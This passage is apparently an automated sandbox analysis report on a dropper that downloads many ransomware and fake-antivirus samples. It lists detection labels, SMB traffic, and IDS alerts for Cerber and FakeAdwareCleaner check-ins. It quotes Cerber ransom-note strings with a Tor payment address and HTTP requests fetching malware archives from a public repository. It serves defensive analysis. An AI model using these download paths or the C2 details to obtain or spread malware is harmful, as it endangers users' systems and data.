          Source: C:\Users\user\Desktop\Endermanch@WinlockerVB6Blacksod.exeMetadefender: Detection: 31%Perma Link
          Source: 07bb0738.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeJoe Sandbox ML: detected
          Source: 14.0.Endermanch@Antivirus.exe.400000.0.unpackAvira: Label: TR/Dldr.FraudLoad.xerf
          Source: 20.0.Endermanch@Birele.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 26.0.avpc2009.exe.400000.0.unpackAvira: Label: TR/Fake.avpc.94312
          Source: 14.0.Endermanch@Antivirus.exe.400000.3.unpackAvira: Label: TR/Dldr.FraudLoad.xerf
          Source: 16.0.Endermanch@AntivirusPro2017.exe.400000.3.unpackAvira: Label: TR/AD.FakeRean.mwfxa
          Source: 20.0.Endermanch@Birele.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 14.0.Endermanch@Antivirus.exe.400000.2.unpackAvira: Label: TR/Dldr.FraudLoad.xerf
          Source: 16.0.Endermanch@AntivirusPro2017.exe.400000.0.unpackAvira: Label: TR/AD.FakeRean.mwfxa
          Source: 50.0.antivirus-platinum.exe.400000.0.unpackAvira: Label: TR/Crypt.CFI.Gen
          Source: 18.0.Endermanch@BadRabbit.exe.1300000.0.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 16.0.Endermanch@AntivirusPro2017.exe.400000.2.unpackAvira: Label: TR/AD.FakeRean.mwfxa
          Source: 20.0.Endermanch@Birele.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 18.2.Endermanch@BadRabbit.exe.1300000.1.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 18.0.Endermanch@BadRabbit.exe.1300000.3.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 18.0.Endermanch@BadRabbit.exe.1300000.2.unpackAvira: Label: TR/ATRAPS.Gen
          Source: 14.0.Endermanch@Antivirus.exe.400000.1.unpackAvira: Label: TR/Dldr.FraudLoad.xerf
          Source: 16.0.Endermanch@AntivirusPro2017.exe.400000.1.unpackAvira: Label: TR/AD.FakeRean.mwfxa
          Source: 20.0.Endermanch@Birele.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 18.0.Endermanch@BadRabbit.exe.1300000.1.unpackAvira: Label: TR/ATRAPS.Gen

          Exploits

          barindex
          Source: global trafficTCP traffic: 192.168.2.0:139
          Source: global trafficTCP traffic: 192.168.2.2:139
          Source: global trafficTCP traffic: 192.168.2.1:80
          Source: global trafficTCP traffic: 192.168.2.4:139
          Source: global trafficTCP traffic: 192.168.2.3:445
          Source: global trafficTCP traffic: 192.168.2.6:139
          Source: global trafficTCP traffic: 192.168.2.5:139
          Source: global trafficTCP traffic: 192.168.2.0:139
          Source: global trafficTCP traffic: 192.168.2.2:139
          Source: global trafficTCP traffic: 192.168.2.1:445
          Source: global trafficTCP traffic: 192.168.2.4:139
          Source: global trafficTCP traffic: 192.168.2.3:445
          Source: global trafficTCP traffic: 192.168.2.6:139
          Source: global trafficTCP traffic: 192.168.2.5:139
          Source: 07bb0738.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 23.50.105.163:443 -> 192.168.2.3:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49818 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.3:49820 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49826 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.208.16.94:443 -> 192.168.2.3:49827 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.208.16.94:443 -> 192.168.2.3:49833 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.189.112.162:443 -> 192.168.2.3:49859 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.189.173.20:443 -> 192.168.2.3:49874 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.189.173.21:443 -> 192.168.2.3:49876 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.189.173.21:443 -> 192.168.2.3:49891 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49892 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49895 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 194.36.89.57:443 -> 192.168.2.3:49906 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.189.112.162:443 -> 192.168.2.3:49934 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.189.173.21:443 -> 192.168.2.3:49935 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.3:49939 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49941 version: TLS 1.2
          Source: 07bb0738.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: F:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\UI\UI\obj\Debug\UI.pdb source: Endermanch@InfinityCrypt.exe, 00000039.00000000.449968322.0000000000363000.00000002.00000001.01000000.00000026.sdmp, Endermanch@InfinityCrypt.exe.0.dr
          Source: Binary string: c:\Users\PresFox\Documents\Visual Studio 2013\Projects\AdwareBooC\AdwareBooC\obj\Release\AdwareBooC.pdb source: Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000036.00000000.446677741.0000000000A22000.00000002.00000001.01000000.00000025.sdmp
          Source: Binary string: F:\DESKTOP!\ChkDsk\ChkDsk\obj\Debug\PremiereCrack.pdb source: Endermanch@InfinityCrypt.exe, 00000039.00000000.451959592.0000000000382000.00000002.00000001.01000000.00000026.sdmp, Endermanch@InfinityCrypt.exe.0.dr
          Source: Binary string: e:\Working Copies\Bundles\Antivirus\Av\release\avt_main.pdb source: Endermanch@Antivirus.exe, 0000000E.00000000.354486231.00000000004AE000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: C:\Users\Kyle\documents\visual studio 2010\Projects\HAPPY ANTIVIRUS\HAPPY ANTIVIRUS\obj\x86\Release\HAPPY ANTIVIRUS.pdb source: Endermanch@HappyAntivirus.exe, 00000028.00000000.429984473.0000000000DD8000.00000002.00000001.01000000.0000001B.sdmp
          Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Endermanch@AntivirusPlatinum.exe, 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmp, Endermanch@AntivirusPlatinum.exe, 0000000F.00000000.359356779.0000000000412000.00000002.00000001.01000000.00000009.sdmp, Endermanch@AnViPC2009.exe, 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmp, Endermanch@AnViPC2009.exe, 00000011.00000000.372360269.0000000000412000.00000002.00000001.01000000.0000000D.sdmp
          Source: Binary string: C:\Users\Anton\Documents\Visual Studio 2013\Projects\p1_p2\Release\p2.pdb source: Endermanch@SecurityDefener2015.exe.0.dr
          Source: Binary string: .cld.cfg.ign.ftm.wdb.gdb.pdb.rmd.zmd.sdb.ldu.ldb.ndu.ndb.mdu.mdb.fp.hdu.hdb.db3.db2.dbcli_tgzload: Can't fdopen() descriptor %d, errno = %d source: avpc2009.exe, 0000001A.00000000.386279142.0000000000516000.00000002.00000001.01000000.00000015.sdmp
          Source: Binary string: C:\Users\Anton\Documents\Visual Studio 2013\Projects\p1_p2\Release\p2.pdb source: Endermanch@SecurityDefener2015.exe.0.dr
          Source: Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 0000001E.00000000.396026322.00000000008C2000.00000002.00000001.01000000.00000018.sdmp
          Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000016.00000003.391522573.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.472917726.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.432023406.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.410488434.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: z:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: x:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: v:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: t:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: r:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: p:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: n:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: l:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: j:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: h:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: f:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: b:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: y:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: w:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: u:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: s:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: q:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: o:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: m:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: k:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: i:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: g:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: e:
          Source: C:\Windows\SysWOW64\netsh.exeFile opened: c:
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeFile opened: a:
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_00405C10 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,15_2_00405C10
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 15_2_0040AE97 SendDlgItemMessageA,DestroyIcon,EndDialog,SetDlgItemTextA,SetDlgItemTextA,SHGetFileInfoA,SendDlgItemMessageA,FindFirstFileA,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,wsprintfA,SetDlgItemTextA,FindClose,wsprintfA,SetDlgItemTextA,SendDlgItemMessageA,DosDateTimeToFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,SetDlgItemTextA,wsprintfA,SetDlgItemTextA,15_2_0040AE97
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_2_00405BD2 FindFirstFileW,GetLastError,FindNextFileW,GetLastError,FindFirstFileA,GetLastError,FindNextFileA,GetLastError,17_2_00405BD2
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeCode function: 17_2_0040AE70 SendDlgItemMessageA,DestroyIcon,EndDialog,SetDlgItemTextA,SetDlgItemTextA,SHGetFileInfoA,SendDlgItemMessageA,FindFirstFileA,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,wsprintfA,SetDlgItemTextA,FindClose,wsprintfA,SetDlgItemTextA,SendDlgItemMessageA,DosDateTimeToFileTime,FileTimeToSystemTime,GetTimeFormatA,GetDateFormatA,wsprintfA,SetDlgItemTextA,wsprintfA,SetDlgItemTextA,17_2_0040AE70

          Networking

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.2 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 80
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.4 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 445
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.6 139
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.5 139
          Source: TrafficSnort IDS: 2023619 ET TROJAN Ransomware/Cerber Checkin M3 (8) 192.168.2.3:55639 -> 93.107.12.4:6893
          Source: TrafficSnort IDS: 2809804 ETPRO MALWARE FakeAdwareCleaner.A Checkin 192.168.2.3:49829 -> 185.53.177.53:80
          Source: Endermanch@Cerber5.exe, 00000017.00000003.463681172.00000000050EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: how to decrypt your files. \n\n If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC, \n follow the instructions below: \n\n 1. Download \"Tor Browser\" from https://www.torproject.org/ and install it. \n 2. In the \"Tor Browser\" open your personal page here: \n\n http://{TOR}.onion/{PC_ID} \n\n Note! This page is available via \"Tor Browser\" only. \n\n\n"},"whitelist":{"folders":["\\bitcoin\\","\\excel\\","\\microsoft sql server\\","\\microsoft\\excel\\","\\microsoft\\microsoft sql server\\","\\microsoft\\office\\","\\microsoft\\onenote\\","\\microsoft\\outlook\\","\\microsoft\\powerpoint\\","\\microsoft\\word\\","\\office\\","\\onenote\\","\\outlook\\","\\powerpoint\\","\\steam\\","\\the bat!\\","\\thunderbird\\","\\word\\"]}}
          Source: Endermanch@Cerber5.exe, 00000017.00000003.463681172.00000000050EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
          Source: Endermanch@Cerber5.exe, 00000017.00000003.397567876.00000000050D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">{RAND}</span>ress <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in this browser address bar;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br></li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">{RAND}</span>dres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in de adresbalk van uw browser;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> dans cette barre d
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in diese Browser-Adressleiste;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nella barra degli indirizzi di questo browser;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> do paska adresu przegl
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nesta barra de endere
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> en la barra de direcciones de este navegador;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">F</span>ress <br><span class="info">http://xpcx6erilkjced3j.onion/7846-944A-0126-0098-B8F9</span><br> in this browser address bar;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/7846-944A-0126-0098-B8F9</span><br>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/7846-944A-0126-0098-B8F9</span><br></li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">zlp</span>dres <br><span class="info">http://xpcx6erilkjced3j.onion/7846-944A-0126-0098-B8F9</span><br> in de adresbalk van uw browser;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://xpcx6erilkjced3j.onion/7846-944A-0126-0098-B8F9</span><br> dans cette barre d
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://xpcx6erilkjced3j.onion/7846-944A-0126-0098-B8F9</span><br> in diese Browser-Adressleiste;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://xpcx6erilkjced3j.onion/7846-944A-0126-0098-B8F9</span><br> nella barra degli indirizzi di questo browser;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://xpcx6erilkjced3j.onion/7846-944A-0126-0098-B8F9</span><br> do paska adresu przegl
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://xpcx6erilkjced3j.onion/7846-944A-0126-0098-B8F9</span><br> nesta barra de endere
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://xpcx6erilkjced3j.onion/7846-944A-0126-0098-B8F9</span><br> en la barra de direcciones de este navegador;</li>
          Source: Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://xpcx6erilkjced3j.onion/7846-944A-0126-0098-B8F9</span><br>
          Source: global trafficTCP traffic: 5.255.255.80 ports 0,443,445,139,8,80
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/NavaShield.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: github.com
